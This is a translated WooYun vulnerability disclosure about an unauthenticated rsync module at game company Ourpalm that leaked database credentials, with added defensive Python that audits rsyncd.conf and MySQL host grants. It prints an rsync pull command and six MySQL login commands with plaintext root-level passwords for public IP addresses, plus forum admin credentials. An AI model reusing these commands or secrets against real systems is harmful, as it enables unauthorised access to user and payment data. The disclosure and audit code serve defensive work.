
Vulnerability summary

Defect ID: wooyun-2013-043358

Title: Ourpalm (掌趣科技) system misconfiguration puts a large amount of database information at risk of being dumped (rsync)

Vendor: Ourpalm (掌趣科技)

Author: 盈盈无绪

Submitted: 2013-11-20 12:03

Fix time: 2014-01-04 12:03

Disclosed: 2014-01-04 12:03

Type: system/service operations misconfiguration

Severity: High

Self-assessed rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2013-11-20: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-01-04: The vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

Ourpalm (掌趣科技), stock code 300315
An Ourpalm system misconfiguration puts a large amount of database information at risk of being dumped

Detailed description:

rsync 219.232.240.2::case


The rsync module requires no authentication, so its contents can be pulled by anyone who can reach the daemon. Among the leaked files were the database credentials listed below. The MySQL accounts are not restricted by source host, so anyone holding a username and password can connect from an arbitrary IP, and the accounts carry very high privileges.
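The exposure above comes down to an rsyncd module with no `auth users` and no `hosts allow` (a bare `rsync host::` lists every module whose `list` parameter is yes, and `rsync host::module` then pulls it). As an added example, not code from the original report or from the vendor, the following Python parses an rsyncd.conf the way the daemon reads it (global section before the first `[module]` supplies defaults) and flags modules exposed the way `case` was. The two configurations are constructed for illustration; the module name `case`, the paths, the user `casebackup` and the 10.0.0.0/24 network are assumptions.

```python
import re

# Constructed rsyncd.conf fragments (not the vendor's real configuration).
# WEAK_CONF is the shape of config that lets `rsync host::case` pull everything;
# HARDENED_CONF pins the module to one network and one authenticated user.
# Module name 'case', the paths, user 'casebackup' and 10.0.0.0/24 are assumptions.
WEAK_CONF = """\
uid = nobody
gid = nobody
use chroot = yes
max connections = 10

[case]
    path = /data/case
    comment = project files
    read only = no
"""

HARDENED_CONF = """\
uid = nobody
gid = nobody
use chroot = yes
max connections = 10
# global defaults apply to every module below
hosts allow = 10.0.0.0/24
auth users = casebackup
secrets file = /etc/rsyncd.secrets
list = no

[case]
    path = /data/case
    comment = project files
    read only = yes
"""


def parse_rsyncd_conf(text):
    """Return {module: {param: value}}, with the global section (everything
    before the first [module]) merged into each module as its defaults."""
    global_params = {}
    modules = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # rsyncd.conf ignores comment lines
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = header.group(1).strip()
            modules[current] = dict(global_params)
            continue
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        target = global_params if current is None else modules[current]
        target[key.lower()] = value
    return modules


def _truthy(value):
    # rsyncd accepts yes/true/1 and no/false/0 for boolean parameters
    return value.strip().lower() in ("yes", "true", "1")


def audit_rsyncd(modules):
    """Return {module: [findings]} for modules exposed like 'case' above."""
    report = {}
    for name, params in modules.items():
        findings = []
        if not params.get("auth users"):
            findings.append("no 'auth users': readable by anyone who can reach the port")
        elif not params.get("secrets file"):
            findings.append("'auth users' set but no 'secrets file': no password database configured")
        if not params.get("hosts allow"):
            findings.append("no 'hosts allow': connections accepted from any source IP")
        if _truthy(params.get("list", "yes")):
            findings.append("'list = yes' (default): module name appears in 'rsync host::' output")
        if not _truthy(params.get("read only", "yes")):
            findings.append("'read only = no': remote clients can also write into the path")
        if findings:
            report[name] = findings
    return report


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_rsyncd(parse_rsyncd_conf(conf)) or "no findings")
```

Run against a real `/etc/rsyncd.conf` the weak module reports four findings and the hardened one none; the rsyncd `secrets file` must also be mode 0600 and owned by the daemon user, which this check does not look at.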

Ourpalm (掌趣科技)
mysql -uroot -pmysql228 -h219.232.240.6
| analyze |
| android |
| bbs |
| cjsh_user |
| cms |
| dx |
| football |
| game_stat |
| game_stat_test |
| gcenter |
| gs |
| lt_wap |
| mis |
| mysql |
| ourpalm |
| ssfee_platform |
| ssfee_platform_test |
| test |
| test_channel |
| union |
| union_test |
| user |
| user_tmp |
| webpay |
| yjws |
| yjws-bak |
mysql -uroot -pmysql35 -h114.66.192.86
| android |
| backup |
| db_sp_gw |
| db_zq_gw |
| echarge |
| mobilecharge |
| mysql |
| paycenter |
| paycenter0708 |
| sms_coop |
| sms_coop2 |
| sms_coop_cz |
| sms_coop_xjoys |
| ssfee_platform |
| stat_fee_xjoys |
| stat_spservice |
| stat_ssfee_logs |
| test |
| webpay |
| webreport |
| webtest |
mysql -uroot -pmysql228 -h124.248.32.246
| analyze |
| bbs |
| bbs_new |
| bbs_test |
| cjsh_user |
| game_stat |
| gcenter |
| mysql |
| ssfee_platform |
| test |
| union |
| user |
| user_tmp |
| webpay |
| yjws |
mysql -ustoneage -pourp@lm -h117.79.132.166
| nagdb |
| stoneage |
| stoneage_18 |
mysql -uwebgame -pmysql39 -h117.79.148.39
| dedecmsv57utf8 |
| dedecmsv57utf8sp1 |
| game |
| gs0708 |
| mysql |
| portal_0708 |
| ultrax |
| user |
mysql -uroot -pmysql242 -h219.232.244.242
| bbs |
| cacti |
| derkhan |
| mysql |
| sanguo_vote |
| stat |
| test |
| webgame_center |
| webpay |
| webpay_test |
| xweibo |
http://bbs.gamebean.com
admin:wanglirong
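The accounts listed above accept their password from any source address, which is what makes the leaked credentials immediately usable. As an added example, not code from the original report, the following Python shows how MySQL interprets the `Host` column of `mysql.user` (a SQL LIKE pattern, or an IPv4 `address/netmask`), audits a set of rows for accounts reachable from arbitrary IPs, and emits the account statements that pin such an account to one source host. The sample rows are constructed: the usernames echo the report, the `Host` values and the 10.0.0.0/24 addresses are assumptions.

```python
import ipaddress
import re

# Constructed sample rows (not real data) in the shape of
#   SELECT User, Host, Super_priv, Grant_priv FROM mysql.user;
# Usernames echo the report; the Host values are assumptions.
SAMPLE_USERS = [
    ("root", "localhost", "Y", "Y"),
    ("root", "%", "Y", "Y"),                         # the weak grant: any source IP
    ("webgame", "%", "N", "N"),
    ("stoneage", "10.0.%", "N", "N"),                # LIKE-style subnet wildcard
    ("report", "10.0.0.0/255.255.255.0", "N", "N"),  # netmask form, a real range
    ("", "localhost", "N", "N"),                     # anonymous account
]


def host_matches(pattern, client):
    """Does a mysql.user Host value admit a client connecting from `client`?

    MySQL treats Host as a SQL LIKE pattern ('%' = any run of characters,
    '_' = exactly one character) or, for IPv4, as 'address/netmask'.
    """
    if "/" in pattern:
        try:
            return ipaddress.IPv4Address(client) in ipaddress.IPv4Network(pattern, strict=False)
        except ValueError:            # non-IPv4 client or malformed pattern
            return False
    regex = "".join(".*" if c == "%" else "." if c == "_" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, client) is not None


def audit_accounts(rows):
    """Return [(user, host, reason)] for accounts usable from arbitrary or
    wildcard source addresses, or anonymous, marking the privileged ones."""
    findings = []
    for user, host, super_priv, grant_priv in rows:
        reasons = []
        if host == "%":
            reasons.append("host allows connections from any address")
        elif "%" in host or "_" in host:
            reasons.append("host is a wildcard pattern, not a single address")
        if user == "":
            reasons.append("anonymous account")
        if reasons and (user == "root" or super_priv == "Y" or grant_priv == "Y"):
            reasons.append("privileged: root, SUPER or GRANT OPTION")
        if reasons:
            findings.append((user, host, "; ".join(reasons)))
    return findings


def remediation_sql(user, host, allowed_host):
    """Account statements that keep the account but pin it to one source
    address. RENAME USER rewrites the host part in place, so the password and
    privileges survive; anonymous accounts are simply dropped."""
    if user == "":
        return [f"DROP USER ''@'{host}';"]
    return [f"RENAME USER '{user}'@'{host}' TO '{user}'@'{allowed_host}';"]


if __name__ == "__main__":
    for user, host, reason in audit_accounts(SAMPLE_USERS):
        print(f"{user!r}@{host!r}: {reason}")
        for stmt in remediation_sql(user, host, "10.0.0.5"):
            print("   ", stmt)
```

Pinning accounts by host is only one layer: the servers above also answered on port 3306 from the Internet, so `bind-address` in the `[mysqld]` section (or a host firewall) should keep the listener off public interfaces regardless of what `mysql.user` says.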

Proof of vulnerability:

(Identical to the connection commands and database listings in the detailed description above.)

Suggested fix:

You should consider replacing your network admins; this is far too weak!

Copyright notice: credit 盈盈无绪@乌云 when reposting


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined to respond